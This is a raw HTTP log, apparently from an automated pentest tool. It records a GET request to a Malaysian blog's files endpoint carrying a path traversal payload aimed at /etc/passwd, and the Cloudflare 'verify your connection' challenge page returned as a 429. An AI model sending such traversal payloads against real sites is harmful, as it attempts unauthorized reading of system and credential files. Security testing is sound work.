REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?name=..%2F..%2F..%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:30:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9649
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b2c3ac8a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=PrkFWBe5KSRXCF1A1Z56XmauByrbHcXw8G3c5eZbY2Mnk%2BgZCE2niwJuIgG%2BwdY%2FG4EU9FevGsHkXUoS8jS18p7rsreFUmAE3RgtL2W7n%2Be%2B9HAmDD4%2Bu0%2FUnjjA1GnpeSkED8Oxb0Zxyg8l8g%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b2c3ac8a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'dVBgCAFFezu8kpJvshAhhrJ0BTcmnpM.fTAWPmggoWg-1784280659-1.2.1.1-0Pj6GhG32O6siPU66dGrXon30tKdp_qk8.NxwXlaGsOYxYwsSO6B.3MvNLn.pneS',cITimeS: '1784280659',cRay: 'a1c83b2c3ac8a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?name=..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_tk=.RoIscSxRONQAaNCqL7Rs6qyD0z4MP.dixx4iKZfhhw-1784280659-1.0.1.1-Wtupts8JgInGzuyyNR8wd7D2cgi4Xuhczw52McbmhWo",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?name=..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=.RoIscSxRONQAaNCqL7Rs6qyD0z4MP.dixx4iKZfhhw-1784280659-1.0.1.1-Wtupts8JgInGzuyyNR8wd7D2cgi4Xuhczw52McbmhWo",md: 'l5ZFsbgKrlu0RUJXfXM8eSV3tqzDQijvJNPmsLtAxC4-1784280659-1.2.1.1-Z3SlLLFcUQEsfu..Qj0gBGd.ESc8wHL4TmLeg654scS5bHkEiGQj7pqkRZHqK1zs9ImBkSsXLkQ4dJNFXlaMmW5wNMe4bTTiJ_BP6ECvZHrrZCJBtOgHURhONGUx0CoydRb_XTL0cvwW0GFyYXhEe.wHXDWlF8kkBpnoHTsdigURLFAmtErdtuYayCuyGj4xQvFmZZJvVmHCL_RUqI4oDlpbUnP5UkoOWXqcvXUyzWejILTjAFZfyY3i1UXW2rtV9OZUx0PJOa2tshoXAliitMDwqcNzP6x3NSR8OMqePi_07EIKL2ATPgyuGy9xP_epn_T.mMvnQlLvdt4mxmCDZIfcUPSw3OFrjiXRpHIizG74LCrBeQ3ZlWLimsc6a2ra.m9fuip3iX5Z.O1.2d4NTwTdr1YgAaaPfaJyGxhSvOKoS5oOu9VFQE8XVWRAYUz.8mx6kQvzsllYjYJ34OY.hyqPQUCFPzjNVVZXmqTyh3GMJV4HsOj1AY7gHprP9UKNnjeYj.du9q8Ef1cZXdwhJINnaiwHA8_lOD7C1ZpepZONqvk3jOwRvECi98RkY8PaQ9gokEJjX.dKJR3_CuoNXUF3u2dohu26j2oOqI12xPKeuD9.SEcx2rL51lXGk6lT6kM8YcLvg63eOxO5gLJNIuS6kb2aR9FpdKEey2_jzON9aCQyd.LzE.YSKSnEyeUJXkJs1JL46XOhCICq2pNpWXqOV7NzicDo29tnvo1RNDvPR3XtPOxMm3GOcpjOa_6xWP3.VTEHhjANpgdRwH73OmZB0lxiapMSvcTEcbsBKTQnxcF3H6jHWWb0xXJtXy3V_7nUVSEcUXkCtSJgSLh26Yh4aw53_DwP3q3dR9jt0LZgHj44_SlB2QQPE93QTAmfyy375b9VF_CBcF19TeWJm4ecz9o0hFwIy5vuA2.N5nAVycnp7fXcMQ3ZV1v8Vs6SrHUXXbakZLEYw.jtADz0bWjTc.HDEy_ApOnz.SmOVusjGDuHOcmI1USn.yIGmpp_eUBt18Wo.mEgP2hovqwiEdI_H.SqO5OF6aM2p6o3rU.jxUvKJAANd_mmOkP3glhNduUuUwwKZ75fWus8pvjhQakpfURvt3Y.iBNiCjHsFThWPOCi69sQK_IpuIx.77ibwK3NikRbE_.LhlcY9xq.07f3cxthmTwK05qMprtZvVk6KyR7rsrxnae8XEqGx6xeR.Ue73KKBZ4RX0uAr6jddoANJIXiX4YtoOPg3lYbgyhfBAY32yG1W4ie.QjPuRSNEyJKwKftKYJVXt05K72AsA',mdrd: 'vFBTP1RSIdp9e2dAoQd5umkLKCbvs.Q9bifp.PlatmU-1784280659-1.2.1.1-KZ31uW5C6LH440_q68LlI.fFF1xxkxY13YCr3C1b6_fu8RIPQ___Z68xu6SDPQuQxXBLCTTK_Ftb8GW9reWDmnKPc4FXQRGF7LizVdJgdPDK0jiBgdYSGNLkAkBTK3FczvQat1OjEMulKRzzFKF55tCeLiEDHY8FkhG5AoPPxax9oSUjM_0megzg4.kHMNQaX2MyPuyWjzk1wJU0YVW0ynrlFTnrZ.ts15Bl9oYcZvGGXN3SmnjtLAdS6GojIxY6',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b2c3ac8a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?name=..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=.RoIscSxRONQAaNCqL7Rs6qyD0z4MP.dixx4iKZfhhw-1784280659-1.0.1.1-Wtupts8JgInGzuyyNR8wd7D2cgi4Xuhczw52McbmhWo"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
